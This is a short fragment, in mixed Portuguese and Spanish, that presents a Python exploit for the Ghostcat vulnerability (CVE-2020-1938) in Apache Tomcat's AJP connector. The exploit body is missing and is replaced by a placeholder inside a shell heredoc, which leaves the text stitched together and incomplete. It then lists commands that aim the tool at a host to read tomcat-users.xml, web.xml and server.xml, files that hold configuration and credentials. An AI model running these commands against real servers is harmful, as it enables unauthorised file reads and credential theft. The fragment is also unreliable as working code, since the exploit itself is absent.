
Exploração em Python para CVE-2020-1938 (Ghostcat) que lê arquivos arbitrários de servidores Apache Tomcat por meio do conector AJP na porta 8009, incluindo arquivos de configuração e credenciais.
Ghostcat - CVE-2020-1938 Exploit Lê arquivos do Tomcat via conector AJP (porta 8009) Uso: python3 ghostcat.py [arquivo] """
cat > ghostcat.py << 'PYEOF' [AQUÍ VA EL CÓDIGO COMPLETO DE ARRIBA] PYEOF
chmod +x ghostcat.py
python3 ghostcat.py ejemplo.com conf/tomcat-users.xml 8009
python3 ghostcat.py ejemplo.com WEB-INF/web.xml 8009
python3 ghostcat.py ejemplo.com conf/server.xml 8009